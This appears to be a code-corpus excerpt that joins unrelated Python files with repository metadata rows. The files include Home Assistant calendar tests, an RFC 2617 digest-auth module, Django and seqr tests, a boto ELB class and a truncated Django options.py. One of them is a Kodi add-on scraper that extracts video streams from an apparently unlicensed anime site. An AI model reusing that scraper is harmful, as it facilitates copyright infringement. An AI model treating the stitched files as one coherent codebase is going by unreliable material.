def run_pipeline(self, with_permalinks=False):
payload = utilities.clean_payload(utilities.get_runargs())
data = {}
data['sources'] = utilities.get_data_urls()
data['success'] = False
data['report'] = app.config['GOODTABLES_PIPELINE_BUILD_ERROR_RESPONSE']
if with_permalinks:
data['permalinks'] = utilities.get_report_permalinks(payload)
if isinstance(payload['data'], FileStorage):
payload['data'] = payload['data'].stream
# build and run a validation pipeline
try:
pipeline = utilities.get_pipeline(payload)
except Exception as e:
pipeline = None
data['report']['error_title'] = e.__class__.__name__
data['report']['error_message'] = compat.str(e)
if isinstance(pipeline, Pipeline):
success, report = pipeline.run()
data.update({'success': success, 'report': report.generate()})
return data
| mit | -7,738,223,652,564,126,000 | 31.255814 | 79 | 0.638789 | false |
kennedyshead/home-assistant | tests/components/google/test_calendar.py | 8 | 11233 | """The tests for the google calendar platform."""
import copy
from unittest.mock import Mock, patch
import httplib2
import pytest
from homeassistant.components.google import (
CONF_CAL_ID,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
CONF_DEVICE_ID,
CONF_ENTITIES,
CONF_NAME,
CONF_TRACK,
DEVICE_SCHEMA,
SERVICE_SCAN_CALENDARS,
do_setup,
)
from homeassistant.const import STATE_OFF, STATE_ON
from homeassistant.helpers.template import DATE_STR_FORMAT
from homeassistant.setup import async_setup_component
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
from tests.common import async_mock_service
GOOGLE_CONFIG = {CONF_CLIENT_ID: "client_id", CONF_CLIENT_SECRET: "client_secret"}
TEST_ENTITY = "calendar.we_are_we_are_a_test_calendar"
TEST_ENTITY_NAME = "We are, we are, a... Test Calendar"
TEST_EVENT = {
"summary": "Test All Day Event",
"start": {},
"end": {},
"location": "Test Cases",
"description": "test event",
"kind": "calendar#event",
"created": "2016-06-23T16:37:57.000Z",
"transparency": "transparent",
"updated": "2016-06-24T01:57:21.045Z",
"reminders": {"useDefault": True},
"organizer": {
"email": "[email protected]",
"displayName": "Organizer Name",
"self": True,
},
"sequence": 0,
"creator": {
"email": "[email protected]",
"displayName": "Organizer Name",
"self": True,
},
"id": "_c8rinwq863h45qnucyoi43ny8",
"etag": '"2933466882090000"',
"htmlLink": "https://www.google.com/calendar/event?eid=*******",
"iCalUID": "[email protected]",
"status": "confirmed",
}
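# The tests below deep-copy TEST_EVENT and fill in its "start"/"end" fields for the
# scenario under test.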
def get_calendar_info(calendar):
"""Convert data from Google into DEVICE_SCHEMA."""
calendar_info = DEVICE_SCHEMA(
{
CONF_CAL_ID: calendar["id"],
CONF_ENTITIES: [
{
CONF_TRACK: calendar["track"],
CONF_NAME: calendar["summary"],
CONF_DEVICE_ID: slugify(calendar["summary"]),
}
],
}
)
return calendar_info
@pytest.fixture(autouse=True)
def mock_google_setup(hass, test_calendar):
"""Mock the google set up functions."""
hass.loop.run_until_complete(async_setup_component(hass, "group", {"group": {}}))
calendar = get_calendar_info(test_calendar)
calendars = {calendar[CONF_CAL_ID]: calendar}
patch_google_auth = patch(
"homeassistant.components.google.do_authentication", side_effect=do_setup
)
patch_google_load = patch(
"homeassistant.components.google.load_config", return_value=calendars
)
patch_google_services = patch("homeassistant.components.google.setup_services")
async_mock_service(hass, "google", SERVICE_SCAN_CALENDARS)
with patch_google_auth, patch_google_load, patch_google_services:
yield
@pytest.fixture(autouse=True)
def mock_http(hass):
"""Mock the http component."""
hass.http = Mock()
@pytest.fixture(autouse=True)
def set_time_zone():
"""Set the time zone for the tests."""
# Set our timezone to CST/Regina so we can check calculations
# This keeps UTC-6 all year round
dt_util.set_default_time_zone(dt_util.get_time_zone("America/Regina"))
yield
dt_util.set_default_time_zone(dt_util.get_time_zone("UTC"))
@pytest.fixture(name="google_service")
def mock_google_service():
"""Mock google service."""
patch_google_service = patch(
"homeassistant.components.google.calendar.GoogleCalendarService"
)
with patch_google_service as mock_service:
yield mock_service
async def test_all_day_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
week_from_today = dt_util.dt.date.today() + dt_util.dt.timedelta(days=7)
end_event = week_from_today + dt_util.dt.timedelta(days=1)
event = copy.deepcopy(TEST_EVENT)
start = week_from_today.isoformat()
end = end_event.isoformat()
event["start"]["date"] = start
event["end"]["date"] = end
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event["summary"],
"all_day": True,
"offset_reached": False,
"start_time": week_from_today.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_future_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
one_hour_from_now = dt_util.now() + dt_util.dt.timedelta(minutes=30)
end_event = one_hour_from_now + dt_util.dt.timedelta(minutes=60)
start = one_hour_from_now.isoformat()
end = end_event.isoformat()
event = copy.deepcopy(TEST_EVENT)
event["start"]["dateTime"] = start
event["end"]["dateTime"] = end
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event["summary"],
"all_day": False,
"offset_reached": False,
"start_time": one_hour_from_now.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_in_progress_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
middle_of_event = dt_util.now() - dt_util.dt.timedelta(minutes=30)
end_event = middle_of_event + dt_util.dt.timedelta(minutes=60)
start = middle_of_event.isoformat()
end = end_event.isoformat()
event = copy.deepcopy(TEST_EVENT)
event["start"]["dateTime"] = start
event["end"]["dateTime"] = end
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_ON
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event["summary"],
"all_day": False,
"offset_reached": False,
"start_time": middle_of_event.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_offset_in_progress_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
middle_of_event = dt_util.now() + dt_util.dt.timedelta(minutes=14)
end_event = middle_of_event + dt_util.dt.timedelta(minutes=60)
start = middle_of_event.isoformat()
end = end_event.isoformat()
event_summary = "Test Event in Progress"
event = copy.deepcopy(TEST_EVENT)
event["start"]["dateTime"] = start
event["end"]["dateTime"] = end
event["summary"] = f"{event_summary} !!-15"
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event_summary,
"all_day": False,
"offset_reached": True,
"start_time": middle_of_event.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
@pytest.mark.skip
async def test_all_day_offset_in_progress_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
tomorrow = dt_util.dt.date.today() + dt_util.dt.timedelta(days=1)
end_event = tomorrow + dt_util.dt.timedelta(days=1)
start = tomorrow.isoformat()
end = end_event.isoformat()
event_summary = "Test All Day Event Offset In Progress"
event = copy.deepcopy(TEST_EVENT)
event["start"]["date"] = start
event["end"]["date"] = end
event["summary"] = f"{event_summary} !!-25:0"
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event_summary,
"all_day": True,
"offset_reached": True,
"start_time": tomorrow.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_all_day_offset_event(hass, mock_next_event):
"""Test that we can create an event trigger on device."""
tomorrow = dt_util.dt.date.today() + dt_util.dt.timedelta(days=2)
end_event = tomorrow + dt_util.dt.timedelta(days=1)
start = tomorrow.isoformat()
end = end_event.isoformat()
offset_hours = 1 + dt_util.now().hour
event_summary = "Test All Day Event Offset"
event = copy.deepcopy(TEST_EVENT)
event["start"]["date"] = start
event["end"]["date"] = end
event["summary"] = f"{event_summary} !!-{offset_hours}:0"
mock_next_event.return_value.event = event
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == STATE_OFF
assert dict(state.attributes) == {
"friendly_name": TEST_ENTITY_NAME,
"message": event_summary,
"all_day": True,
"offset_reached": False,
"start_time": tomorrow.strftime(DATE_STR_FORMAT),
"end_time": end_event.strftime(DATE_STR_FORMAT),
"location": event["location"],
"description": event["description"],
}
async def test_update_error(hass, google_service):
"""Test that the calendar handles a server error."""
google_service.return_value.get = Mock(
side_effect=httplib2.ServerNotFoundError("unit test")
)
assert await async_setup_component(hass, "google", {"google": GOOGLE_CONFIG})
await hass.async_block_till_done()
state = hass.states.get(TEST_ENTITY)
assert state.name == TEST_ENTITY_NAME
assert state.state == "off"
| apache-2.0 | 7,621,273,218,091,933,000 | 34.547468 | 85 | 0.645776 | false |
OpenQbo/qbo_webi | src/teleoperation/sip2rtmp/p2p-sip/src/std/rfc2617.py | 4 | 6811 | # Copyright (c) 2007, Kundan Singh. All rights reserved. See LICENSING for details.
# @implements RFC2617 (HTTP auth)
'''
The HTTP basic and digest access authentication as per RFC 2617.
'''
from random import randint
from hashlib import md5
from base64 import b64encode
import time
# @implements RFC2617 P3L16-P3L25
_quote = lambda s: '"' + s + '"' if not s or s[0] != '"' != s[-1] else s
_unquote = lambda s: s[1:-1] if s and s[0] == '"' == s[-1] else s
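# e.g. _quote('iptel.org') == '"iptel.org"' and _unquote('"iptel.org"') == 'iptel.org'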
def createAuthenticate(authMethod='Digest', **kwargs):
'''Build the WWW-Authenticate header's value.
>>> print createAuthenticate('Basic', realm='iptel.org')
Basic realm="iptel.org"
>>> print createAuthenticate('Digest', realm='iptel.org', domain='sip:iptel.org', nonce='somenonce')
Digest realm="iptel.org", domain="sip:iptel.org", qop="auth", nonce="somenonce", opaque="", stale=FALSE, algorithm=MD5
'''
if authMethod.lower() == 'basic':
return 'Basic realm=%s'%(_quote(kwargs.get('realm', '')))
elif authMethod.lower() == 'digest':
predef = ('realm', 'domain', 'qop', 'nonce', 'opaque', 'stale', 'algorithm')
unquoted = ('stale', 'algorithm')
now = time.time(); nonce = kwargs.get('nonce', b64encode('%d %s'%(now, md5('%d:%d'%(now, id(createAuthenticate))))))
default = dict(realm='', domain='', opaque='', stale='FALSE', algorithm='MD5', qop='auth', nonce=nonce)
kv = map(lambda x: (x, kwargs.get(x, default[x])), predef) + filter(lambda x: x[0] not in predef, kwargs.items()) # put predef attributes in order before non predef attributes
return 'Digest ' + ', '.join(map(lambda y: '%s=%s'%(y[0], _quote(y[1]) if y[0] not in unquoted else y[1]), kv))
    else: raise ValueError, 'invalid authMethod %s'%(authMethod)
# @implements RFC2617 P3L27-P3L36
# @implements RFC2617 P4L14-P4L29
def createAuthorization(challenge, username, password, uri=None, method=None, entityBody=None, context=None):
'''Build the Authorization header for this challenge. The challenge represents the
WWW-Authenticate header's value and the function returns the Authorization
header's value. The context (dict) is used to save cnonce and nonceCount
if available. The uri represents the request URI str, and method the request
method. The result contains the properties in alphabetical order of property name.
>>> context = {'cnonce':'0a4f113b', 'nc': 0}
>>> print createAuthorization('Digest realm="[email protected]", qop="auth", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"', 'Mufasa', 'Circle Of Life', '/dir/index.html', 'GET', None, context)
Digest cnonce="0a4f113b",nc=00000001,nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",opaque="5ccc069c403ebaf9f0171e9517f40e41",qop=auth,realm="[email protected]",response="6629fae49393a05397450978507c4ef1",uri="/dir/index.html",username="Mufasa"
>>> print createAuthorization('Basic realm="WallyWorld"', 'Aladdin', 'open sesame')
Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
'''
authMethod, sep, rest = challenge.strip().partition(' ')
ch, cr = dict(), dict() # challenge and credentials
cr['password'] = password
cr['username'] = username
# @implements RFC2617 P5L20-P5L41
if authMethod.lower() == 'basic':
return authMethod + ' ' + basic(cr)
# @implements RFC2617 P6L46-P7L5
elif authMethod.lower() == 'digest':
for n,v in map(lambda x: x.strip().split('='), rest.split(',') if rest else []):
ch[n.lower().strip()] = _unquote(v.strip())
# TODO: doesn't work if embedded ',' in value, e.g., qop="auth,auth-int"
# @implements RFC2617 P8L3-P8L25
for y in filter(lambda x: x in ch, ['username', 'realm', 'nonce', 'opaque', 'algorithm']):
cr[y] = ch[y]
cr['uri'] = uri
cr['httpMethod'] = method
if 'qop' in ch:
if context and 'cnonce' in context:
cnonce, nc = context['cnonce'], context['nc'] + 1
else:
cnonce, nc = H(str(randint(0, 2**31))), 1
if context:
context['cnonce'], context['nc'] = cnonce, nc
cr['qop'], cr['cnonce'], cr['nc'] = 'auth', cnonce, '%08x'% nc
# @implements RFC2617 P11L11-P11L30
cr['response'] = digest(cr)
items = sorted(filter(lambda x: x not in ['name', 'authMethod', 'value', 'httpMethod', 'entityBody', 'password'], cr))
return authMethod + ' ' + ','.join(map(lambda y: '%s=%s'%(y, (cr[y] if y == 'qop' or y == 'nc' else _quote(cr[y]))), items))
else:
raise ValueError, 'Invalid auth method -- ' + authMethod
# @implements RFC2617 P10L19-P10L33
H = lambda d: md5(d).hexdigest()
KD = lambda s, d: H(s + ':' + d)
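# H(d) is the hex MD5 digest of d; KD(secret, data) is H(secret ":" data), per RFC 2617.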
# @implements RFC2617 P18L34-P19L9
def digest(cr):
'''Create a digest response for the credentials.
>>> input = {'httpMethod':'GET', 'username':'Mufasa', 'password': 'Circle Of Life', 'realm':'[email protected]', 'algorithm':'md5', 'nonce':'dcd98b7102dd2f0e8b11d0f600bfb0c093', 'uri':'/dir/index.html', 'qop':'auth', 'nc': '00000001', 'cnonce':'0a4f113b', 'opaque':'5ccc069c403ebaf9f0171e9517f40e41'}
>>> print digest(input)
"6629fae49393a05397450978507c4ef1"
'''
algorithm, username, realm, password, nonce, cnonce, nc, qop, httpMethod, uri, entityBody \
= map(lambda x: cr[x] if x in cr else None, ['algorithm', 'username', 'realm', 'password', 'nonce', 'cnonce', 'nc', 'qop', 'httpMethod', 'uri', 'entityBody'])
# @implements RFC2617 P13L26-P13L45
if algorithm and algorithm.lower() == 'md5-sess':
A1 = H(username + ':' + realm + ':' + password) + ':' + nonce + ':' + cnonce
else:
A1 = username + ':' + realm + ':' + password
# @implements RFC2617 P14L10-P14L17
if not qop or qop == 'auth':
A2 = httpMethod + ':' + str(uri)
else:
A2 = httpMethod + ':' + str(uri) + ':' + H(str(entityBody))
# @implements RFC2617 P13L6-P13L20
if qop and (qop == 'auth' or qop == 'auth-int'):
a = nonce + ':' + str(nc) + ':' + cnonce + ':' + qop + ':' + A2
return _quote(KD(H(A1), nonce + ':' + str(nc) + ':' + cnonce + ':' + qop + ':' + H(A2)))
else:
return _quote(KD(H(A1), nonce + ':' + H(A2)))
# @implements RFC2617 P6L8-P6L11
def basic(cr):
'''Create a basic response for the credentials.
>>> print basic({'username':'Aladdin', 'password':'open sesame'})
QWxhZGRpbjpvcGVuIHNlc2FtZQ==
'''
# @implements RFC2617 P5L43-P6L6
return b64encode(cr['username'] + ':' + cr['password'])
if __name__ == '__main__':
import doctest
doctest.testmod() | gpl-2.0 | 2,026,771,447,023,723,000 | 49.613636 | 305 | 0.606519 | false |
macarthur-lab/xbrowse | seqr/views/apis/gene_api_tests.py | 1 | 3060 | import json
from django.test import TransactionTestCase
from django.urls.base import reverse
from seqr.models import GeneNote
from seqr.views.apis.gene_api import gene_info, create_gene_note_handler, update_gene_note_handler, delete_gene_note_handler
from seqr.views.utils.test_utils import _check_login
GENE_ID = 'ENSG00000223972'
class GeneAPITest(TransactionTestCase):
fixtures = ['users', 'reference_data']
def test_gene_info(self):
url = reverse(gene_info, args=[GENE_ID])
_check_login(self, url)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
gene = response.json()['genesById'][GENE_ID]
self.assertSetEqual(set(gene.keys()), {
'chromGrch37', 'chromGrch38', 'codingRegionSizeGrch37', 'codingRegionSizeGrch38', 'constraints',
'diseaseDesc', 'endGrch37', 'endGrch38', 'functionDesc', 'gencodeGeneType', 'geneId', 'geneSymbol',
'omimPhenotypes', 'mimNumber', 'startGrch37', 'startGrch38', 'notes', 'mgiMarkerId', 'geneNames',
})
def test_create_update_and_delete_gene_note(self):
create_gene_note_url = reverse(create_gene_note_handler, args=[GENE_ID])
_check_login(self, create_gene_note_url)
# send valid request to create gene_note
response = self.client.post(create_gene_note_url, content_type='application/json', data=json.dumps(
{'note': 'new_gene_note'}
))
self.assertEqual(response.status_code, 200)
new_note_response = response.json()['genesById'][GENE_ID]['notes'][0]
self.assertEqual(new_note_response['note'], 'new_gene_note')
new_gene_note = GeneNote.objects.filter(guid=new_note_response['noteGuid']).first()
self.assertIsNotNone(new_gene_note)
self.assertEqual(new_gene_note.note, new_note_response['note'])
# update the gene_note
update_gene_note_url = reverse(update_gene_note_handler, args=[GENE_ID, new_gene_note.guid])
response = self.client.post(update_gene_note_url, content_type='application/json', data=json.dumps(
{'note': 'updated_gene_note'}))
self.assertEqual(response.status_code, 200)
updated_note_response = response.json()['genesById'][GENE_ID]['notes'][0]
self.assertEqual(updated_note_response['note'], 'updated_gene_note')
updated_gene_note = GeneNote.objects.filter(guid=updated_note_response['noteGuid']).first()
self.assertIsNotNone(updated_gene_note)
self.assertEqual(updated_gene_note.note, updated_note_response['note'])
# delete the gene_note
delete_gene_note_url = reverse(delete_gene_note_handler, args=[GENE_ID, updated_gene_note.guid])
response = self.client.post(delete_gene_note_url, content_type='application/json')
self.assertEqual(response.status_code, 200)
# check that gene_note was deleted
new_gene_note = GeneNote.objects.filter(guid=updated_note_response['noteGuid'])
self.assertEqual(len(new_gene_note), 0)
| agpl-3.0 | 2,172,696,810,965,846,300 | 43.347826 | 124 | 0.673203 | false |
barseghyanartur/django-material | tests/integration/tests/test_textinput.py | 10 | 4970 | import json
from django import forms
from django_webtest import WebTest
from . import build_test_urls
class TextInputForm(forms.Form):
test_field = forms.CharField(
min_length=5,
max_length=20,
widget=forms.TextInput(attrs={'data-test': 'Test Attr'}))
class TestTextInput(WebTest):
default_form = TextInputForm
urls = 'tests.integration.tests.test_textinput'
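    # The .url and .template attributes used on each test method below are attached
    # by build_test_urls() at the bottom of this module.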
def test_default_usecase(self):
page = self.app.get(self.test_default_usecase.url)
self.assertIn('id="id_test_field_container"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field"', page.body.decode('utf-8'))
self.assertIn('maxlength="20"', page.body.decode('utf-8'))
self.assertIn('data-test="Test Attr"', page.body.decode('utf-8'))
form = page.form
self.assertIn('test_field', form.fields)
form['test_field'] = 'TEST CONTENT'
response = json.loads(form.submit().body.decode('utf-8'))
self.assertIn('cleaned_data', response)
self.assertIn('test_field', response['cleaned_data'])
self.assertEquals('TEST CONTENT', response['cleaned_data']['test_field'])
def test_missing_value_error(self):
form = self.app.get(self.test_missing_value_error.url).form
response = form.submit()
self.assertIn('has-error', response.body.decode('utf-8'))
self.assertIn('This field is required.', response.body.decode('utf-8'))
def test_render_with_value(self):
form = self.app.get(self.test_render_with_value.url).form
form['test_field'] = 'a'*21
response = form.submit()
self.assertIn('value="{}"'.format('a'*21), response.body.decode('utf-8'))
self.assertIn('Ensure this value has at most 20 characters', response.body.decode('utf-8'))
def test_part_group_class(self):
page = self.app.get(self.test_part_group_class.url)
self.assertIn('class="input-field col s12 yellow"', page.body.decode('utf-8'))
test_part_group_class.template = '''
{% form %}
{% part form.test_field group_class %}input-field col s12 yellow{% endpart %}
{% endform %}
'''
def test_part_add_group_class(self):
page = self.app.get(self.test_part_add_group_class.url)
self.assertIn('class="input-field col s12 required deep-purple lighten-5"', page.body.decode('utf-8'))
test_part_add_group_class.template = '''
{% form %}
{% part form.test_field add_group_class %}deep-purple lighten-5{% endpart %}
{% endform %}
'''
def test_part_prefix(self):
response = self.app.get(self.test_part_prefix.url)
self.assertIn('<i class="mdi-communication-email prefix"></i>', response.body.decode('utf-8'))
test_part_prefix.template = '''
{% form %}
{% part form.test_field prefix %}<i class="mdi-communication-email prefix"></i>{% endpart %}
{% endform %}
'''
def test_part_add_control_class(self):
response = self.app.get(self.test_part_add_control_class.url)
self.assertIn('class="orange"', response.body.decode('utf-8'))
test_part_add_control_class.template = '''
{% form %}
{% part form.test_field add_control_class %}orange{% endpart %}
{% endform %}
'''
def test_part_label(self):
response = self.app.get(self.test_part_label.url)
self.assertIn('<label for="id_test_field">My label</label>', response.body.decode('utf-8'))
test_part_label.template = '''
{% form %}
{% part form.test_field label %}<label for="id_test_field">My label</label>{% endpart %}
{% endform %}
'''
def test_part_add_label_class(self):
response = self.app.get(self.test_part_add_label_class.url)
self.assertIn('<label for="id_test_field" class="green-text">Test field</label>', response.body.decode('utf-8'))
test_part_add_label_class.template = '''
{% form %}
{% part form.test_field add_label_class %}green-text{% endpart %}
{% endform %}
'''
def test_part_help_text(self):
response = self.app.get(self.test_part_help_text.url)
self.assertIn('<small class="help-block">My help</small>', response.body.decode('utf-8'))
test_part_help_text.template = '''
{% form %}
{% part form.test_field help_text %}<small class="help-block">My help</small>{% endpart %}
{% endform %}
'''
def test_part_errors(self):
response = self.app.get(self.test_part_errors.url)
self.assertIn('<div class="errors"><small class="error">My Error</small></div>', response.body.decode('utf-8'))
test_part_errors.template = '''
{% form %}
            {% part form.test_field errors %}<div class="errors"><small class="error">My Error</small></div>{% endpart %}
{% endform %}
'''
urlpatterns = build_test_urls(TestTextInput)
| bsd-3-clause | 3,600,718,790,823,478,000 | 36.089552 | 122 | 0.608853 | false |
linkedin/indextank-service | api/boto/ec2/elb/healthcheck.py | 11 | 2662 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class HealthCheck(object):
"""
Represents an EC2 Access Point Health Check
"""
def __init__(self, access_point=None, interval=30, target=None,
healthy_threshold=3, timeout=5, unhealthy_threshold=5):
self.access_point = access_point
self.interval = interval
self.target = target
self.healthy_threshold = healthy_threshold
self.timeout = timeout
self.unhealthy_threshold = unhealthy_threshold
def __repr__(self):
return 'HealthCheck:%s' % self.target
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Interval':
self.interval = int(value)
elif name == 'Target':
self.target = value
elif name == 'HealthyThreshold':
self.healthy_threshold = int(value)
elif name == 'Timeout':
self.timeout = int(value)
elif name == 'UnhealthyThreshold':
self.unhealthy_threshold = int(value)
else:
setattr(self, name, value)
def update(self):
if not self.access_point:
return
new_hc = self.connection.configure_health_check(self.access_point,
self)
self.interval = new_hc.interval
self.target = new_hc.target
self.healthy_threshold = new_hc.healthy_threshold
self.unhealthy_threshold = new_hc.unhealthy_threshold
self.timeout = new_hc.timeout
| apache-2.0 | 8,682,352,233,627,036,000 | 38.147059 | 74 | 0.661157 | false |
azumimuo/family-xbmc-addon | plugin.video.bubbles/resources/lib/sources/english/hoster/open/gogoanime.py | 1 | 3837 | # -*- coding: utf-8 -*-
'''
Bubbles Addon
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse,json
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import directstream
from resources.lib.modules import source_utils
from resources.lib.modules import tvmaze
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.genre_filter = ['animation', 'anime']
self.domains = ['gogoanimemobile.com', 'gogoanimemobile.net', 'gogoanime.io']
self.base_link = 'http://ww1.gogoanime.io'
self.search_link = '/search.html?keyword=%s'
self.episode_link = '/%s-episode-%s'
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
tv_maze = tvmaze.tvMaze()
tvshowtitle = tv_maze.showLookup('thetvdb', tvdb)
tvshowtitle = tvshowtitle['name']
t = cleantitle.get(tvshowtitle)
q = urlparse.urljoin(self.base_link, self.search_link)
q = q % urllib.quote_plus(tvshowtitle)
r = client.request(q)
r = client.parseDOM(r, 'ul', attrs={'class': 'items'})
r = client.parseDOM(r, 'li')
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title'), re.findall('\d{4}', i)) for i in r]
r = [(i[0][0], i[1][0], i[2][-1]) for i in r if i[0] and i[1] and i[2]]
r = [i for i in r if t == cleantitle.get(i[1]) and year == i[2]]
r = r[0][0]
url = re.findall('(?://.+?|)(/.+)', r)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
tv_maze = tvmaze.tvMaze()
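            # The site addresses episodes by absolute number, so map (season, episode)
            # to the absolute episode number via TVmaze before building the URL.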
num = tv_maze.episodeAbsoluteNumber(tvdb, int(season), int(episode))
url = [i for i in url.strip('/').split('/')][-1]
url = self.episode_link % (url, num)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
r = client.parseDOM(r, 'iframe', ret='src')
for u in r:
try:
if not u.startswith('http') and not 'vidstreaming' in u: raise Exception()
url = client.request(u)
url = client.parseDOM(url, 'source', ret='src')
for i in url:
try: sources.append({'source': 'gvideo', 'quality': directstream.googletag(i)[0]['quality'], 'language': 'en', 'url': i, 'direct': True, 'debridonly': False})
except: pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return directstream.googlepass(url)
| gpl-2.0 | -2,185,568,075,376,425,700 | 31.794872 | 182 | 0.565546 | false |
hectord/lettuce | tests/integration/lib/Django-1.2.5/django/db/models/options.py | 43 | 19583 | import re
from bisect import bisect
from django.conf import settings
from django.db.models.related import RelatedObject
from django.db.models.fields.related import ManyToManyRel
from django.db.models.fields import AutoField, FieldDoesNotExist
from django.db.models.fields.proxy import OrderWrt
from django.db.models.loading import get_models, app_cache_ready
from django.utils.translation import activate, deactivate_all, get_language, string_concat
from django.utils.encoding import force_unicode, smart_str
from django.utils.datastructures import SortedDict
# Calculate the verbose_name by converting from InitialCaps to "lowercase with spaces".
get_verbose_name = lambda class_name: re.sub('(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', ' \\1', class_name).lower().strip()
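# e.g. get_verbose_name('ProjectMember') -> 'project member'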
DEFAULT_NAMES = ('verbose_name', 'verbose_name_plural', 'db_table', 'ordering',
'unique_together', 'permissions', 'get_latest_by',
'order_with_respect_to', 'app_label', 'db_tablespace',
'abstract', 'managed', 'proxy', 'auto_created')
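# These correspond to options a model's inner Meta class may define, e.g. (illustrative):
#     class Meta:
#         verbose_name = 'news article'
#         ordering = ['-pub_date']
#         unique_together = (('slug', 'site'),)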
class Options(object):
def __init__(self, meta, app_label=None):
self.local_fields, self.local_many_to_many = [], []
self.virtual_fields = []
self.module_name, self.verbose_name = None, None
self.verbose_name_plural = None
self.db_table = ''
self.ordering = []
self.unique_together = []
self.permissions = []
self.object_name, self.app_label = None, app_label
self.get_latest_by = None
self.order_with_respect_to = None
self.db_tablespace = settings.DEFAULT_TABLESPACE
self.admin = None
self.meta = meta
self.pk = None
self.has_auto_field, self.auto_field = False, None
self.abstract = False
self.managed = True
self.proxy = False
self.proxy_for_model = None
self.parents = SortedDict()
self.duplicate_targets = {}
self.auto_created = False
# To handle various inheritance situations, we need to track where
# managers came from (concrete or abstract base classes).
self.abstract_managers = []
self.concrete_managers = []
# List of all lookups defined in ForeignKey 'limit_choices_to' options
# from *other* models. Needed for some admin checks. Internal use only.
self.related_fkey_lookups = []
